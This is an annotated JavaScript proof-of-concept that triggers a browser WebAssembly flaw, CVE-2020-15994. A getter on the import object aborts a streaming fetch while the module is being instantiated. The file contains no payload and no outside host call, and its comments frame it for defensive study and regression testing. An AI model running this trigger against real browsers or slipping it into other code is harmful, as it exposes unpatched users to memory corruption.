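/*
RCE proof of concept (PoC) for CVE-2020-15994.
As listed here, the script only sets up the triggering call sequence: the promise
callback at the end is empty and none of the module's exports are called.
*/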
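/**
 * Wrap binary data in a Blob and return a `blob:` object URL for it.
 *
 * The view itself is handed to the Blob constructor rather than its
 * `.buffer`, so a typed array that covers only part of a larger ArrayBuffer
 * (for example the result of `subarray()`) contributes just its own bytes.
 * For an array that spans its whole buffer the resulting Blob is unchanged.
 * A plain ArrayBuffer is accepted as well.
 *
 * The URL is never revoked here; a caller that no longer needs it should
 * release it with `URL.revokeObjectURL(url)`.
 *
 * @param {ArrayBufferView|ArrayBuffer} typedArray - Bytes to expose.
 * @param {string} mimeType - Value for the Blob's `type`, reported as the
 *   Content-Type when the URL is fetched.
 * @returns {string} The object URL referring to the new Blob.
 */
function typedArrayToURL(typedArray, mimeType) {
  const blob = new Blob([typedArray], { type: mimeType });
  return URL.createObjectURL(blob);
}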
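// Raw bytes of the WebAssembly module that the script later serves to itself
// through a blob: URL. Reading the sections by hand:
//   - type section:   (i32) -> (), () -> (), (i32, i32, i32) -> ()
//   - import section: env1.JsFunction1 and env.JsFunction, both (i32) -> ()
//   - memory section: one memory, 256 pages minimum and maximum
//   - export section: "memory", "createRecord", "_start"
//   - code section:   one body that is a single nop, one body that calls each
//                     import once with the constant 0
//   - data section:   three bytes placed at offset 1536
// There is no start section, so nothing in the module runs on instantiation.
// The bytes carry no payload; the module matters here only because it has
// imports that must be looked up on the JS import object.
//
// Declared explicitly: the bare assignment in the original created an implicit
// global, which throws a ReferenceError in strict mode and in ES modules.
// `var` matches the file's other declarations and keeps the name on the global
// object when the file is loaded as a classic script.
var wasmCode_Info = new Uint8Array([
  0x00, 0x61, 0x73, 0x6D, 0x01, 0x00, 0x00, 0x00, 0x01, 0x0E, 0x03, 0x60, 0x01, 0x7F, 0x00, 0x60,
  0x00, 0x00, 0x60, 0x03, 0x7F, 0x7F, 0x7F, 0x00, 0x02, 0x25, 0x02, 0x04, 0x65, 0x6E, 0x76, 0x31,
  0x0B, 0x4A, 0x73, 0x46, 0x75, 0x6E, 0x63, 0x74, 0x69, 0x6F, 0x6E, 0x31, 0x00, 0x00, 0x03, 0x65,
  0x6E, 0x76, 0x0A, 0x4A, 0x73, 0x46, 0x75, 0x6E, 0x63, 0x74, 0x69, 0x6F, 0x6E, 0x00, 0x00, 0x03,
  0x03, 0x02, 0x01, 0x02, 0x05, 0x06, 0x01, 0x01, 0x80, 0x02, 0x80, 0x02, 0x07, 0x22, 0x03, 0x06,
  0x6D, 0x65, 0x6D, 0x6F, 0x72, 0x79, 0x02, 0x00, 0x0C, 0x63, 0x72, 0x65, 0x61, 0x74, 0x65, 0x52,
  0x65, 0x63, 0x6F, 0x72, 0x64, 0x00, 0x03, 0x06, 0x5F, 0x73, 0x74, 0x61, 0x72, 0x74, 0x00, 0x02,
  0x0A, 0x10, 0x02, 0x03, 0x00, 0x01, 0x0B, 0x0A, 0x00, 0x41, 0x00, 0x10, 0x01, 0x41, 0x00, 0x10,
  0x00, 0x0B, 0x0B, 0x0A, 0x01, 0x00, 0x41, 0x80, 0x0C, 0x0B, 0x03, 0xA0, 0x06, 0x50,
]);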
// Trigger sequence for the issue the file header attributes to CVE-2020-15994.
// The code is left exactly as published because its effect depends on the
// order in which these statements and the getter below run.
// NOTE(review): confirm affected and fixed browser versions against the vendor
// advisory before relying on this file as a regression test; the page itself
// states neither.

// The AbortController's signal is attached to the fetch() further down, so
// calling controller.abort() cancels that request.
var controller = new AbortController();
var signal = controller.signal;
// Modal dialog: script execution pauses here until it is dismissed.
alert("Exploit!");
// Import object with one namespace per module import (env.JsFunction and
// env1.JsFunction1). Both callbacks only log their argument.
var importObject = {
env: { JsFunction: num => { console.log(num) },},
env1: { JsFunction1: num => { console.log(num) },}
}
// Replaces the plain `env` data property with an accessor (via the legacy
// __defineGetter__ API). The getter therefore runs when `env` is read from
// the import object, which WebAssembly instantiation has to do to resolve the
// module's `env` import. Inside that callback the script aborts the fetch
// that is supplying the module bytes, i.e. user code cancels the stream while
// it is being invoked from within the instantiation itself, and then returns
// a normal-looking namespace object.
// Defensive reading: an accessor on a WebAssembly import object that has side
// effects on the request being streamed is the pattern to look for in samples.
importObject.__defineGetter__('env', function () {
console.log("Callback function");
controller.abort();
return { JsFunction: num => { console.log(num) } };
});
// Serves the byte array to itself as a blob: URL with the application/wasm
// MIME type and passes the abortable fetch to instantiateStreaming together
// with the import object above.
// The fulfilment callback is empty and there is no rejection handler, so the
// script never calls an export and an abort-induced rejection goes unhandled.
WebAssembly.instantiateStreaming(fetch(typedArrayToURL(wasmCode_Info, 'application/wasm'), { signal }), importObject)
.then(function (obj) {
});